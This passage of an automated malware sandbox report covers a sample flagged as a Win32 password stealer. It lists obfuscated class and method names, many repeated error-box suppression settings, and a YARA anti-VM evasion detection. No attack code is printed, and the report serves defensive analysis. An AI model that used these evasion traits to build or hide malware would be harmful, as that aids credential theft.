                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, QlikXE5h4BVcbGqKfD.csHigh entropy of concatenated method names: 'ToString', 'qqpHWvlA8B', 'g60HwyIB7n', 'dN8HJVMGNl', 'zuZHViwXpC', 'sySHhlcjG7', 'AR3HqXXKyr', 'vZ1HlDEx0T', 'fGBHdr3Jnt', 'SPJHSvGqip'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, hOTPGSMDKXb9cMbJr8.csHigh entropy of concatenated method names: 'f8049SoptA', 'YfE4ueVPiN', 'Flm4nFy0IA', 'Epy4MWcQ5Q', 'Elk4RWwYy3', 'DHs4HrNt8Y', 'a4N4aDKp06', 'm094YJ1RIH', 'vbK4tX2c78', 'eN44BHcVuA'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, VvvHW3sK9GlbYJE8nM.csHigh entropy of concatenated method names: 'RYsAehwDiP', 'zFCACQ2J2x', 'T0LALOi1EN', 'W6HAxOpTZ0', 'Kf3ANZsicw', 'g9RLXDr5KB', 'PftLUK1icg', 'zxFL0LlXIg', 'WIqL8twyyw', 'M1oL7LLMNC'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, H34iOAFmVV65c8YFXM9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jDPBvletU9', 'brPB2Xr5RU', 'zSoB5osJD0', 'x3hB6UCkIW', 'XOkBXl777E', 'YsgBU14frM', 'vqiB0EPjq0'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, vooSlJOBJDDa5Qmq4G.csHigh entropy of concatenated method names: 'rkiL1saMob', 'd4LLgHU3lk', 'Fvh4J2drIi', 'BQC4VOtq0J', 'bZw4he6huo', 'MlL4qF8FMZ', 'P5W4lhLQ6v', 'eLX4dV6kLt', 'zWh4S84pMa', 'FCR4ircVuv'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, DjurXFvDopf47O7rJX.csHigh entropy of concatenated method names: 'sDIRiGou40', 'BmGRrl1U0Q', 'IfXRv8TxLQ', 'PAnR20bbYO', 'IRpRwB8xl0', 'rGQRJTJ643', 'F1JRVsNU8T', 'tKmRhPlN9P', 'xkKRqOHcMn', 'vOxRl2Smxp'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, AnIhGBzOG2O54wNgET.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhrtkRLMLo', 'lEttRheG2g', 'EajtHgTvFI', 'XxVtaLEJ6v', 'ebJtY55Pyq', 'zq5ttdksK2', 'WuCtBHI2GR'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, y6nwLOCIecbrubyHfN.csHigh entropy of concatenated method names: 'Dispose', 'XAOF7k2JLD', 'xueQwIEWX3', 'UmKqqXpt14', 'SZcFpu1nsF', 'CXLFzJF4Tx', 'ProcessDialogKey', 'D9lQDurfDL', 'y02QFm0gej', 'maJQQPoZtq'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, KjDrJMSf6Rd7iBJwMk.csHigh entropy of concatenated method names: 'M2fxcKWMfP', 'mPmxyoE3rB', 'u75xTY6de8', 'Dylx93jcEE', 'GXmx14wxHf', 'R4OxuXtv9F', 'CHFxgPouTA', 'YnFxnxWYQt', 'CdNxMGMYhy', 'd6pxO5UaVy'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, A0TVRGnLJriQNkOpn2.csHigh entropy of concatenated method names: 'uOyCvgXUwY', 'qLUC2D3wmH', 'iHGC5pGF6s', 'hfiC6BtPDm', 'HapCXkvq4G', 'BlMCUKag1Q', 'NrfC0HLfJY', 'G7EC841g0a', 'k0mC79Q8YV', 'CENCpYqwxB'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, GTc1VqlAm8uovfdhgw.csHigh entropy of concatenated method names: 'exFxGEKlQA', 'D1Wx4VoIND', 'ATwxA2CFjt', 'DpZApnc20Q', 'CI8AzMAuUW', 'vmIxDebEUD', 'CQdxFGFH57', 'BihxQMY78u', 'E9BxmqxiXG', 'pNaxb3voiY'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, fvKfCYFDPQlmcTCYmtd.csHigh entropy of concatenated method names: 'qn9tcc99Ik', 'H0stylZbZP', 'ECJtTYKWDu', 'NXtt998Cn6', 'lwet1Rknew', 'S2wtuEftK6', 'piPtgcl0ka', 'oQhtndKGqA', 'OVVtMpNpY0', 'v3utOrAGNk'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, xHdZDuN64xOUNM1w8q.csHigh entropy of concatenated method names: 'iDfmeKFBug', 'aJPmG21vSU', 'oNvmC4Sypl', 'aYmm4DWmNe', 'bnImLYl6vl', 'K4YmAHecTF', 'gpfmxnWKaQ', 'CU5mNBvuTv', 'l0amZ7NuG0', 'LFUmopt7Qp'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, sxkk3JUxKw3K4ph6N0.csHigh entropy of concatenated method names: 'rY2a8cZuso', 'OX1ape1afG', 'fjfYDcCRHk', 'inWYFS3WRI', 'NvBaWnrJwg', 'bCKarTEbbr', 'OccaKe7Rh1', 'QVkavnPakn', 'OHra2FRMjC', 'mGUa5NsscJ'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
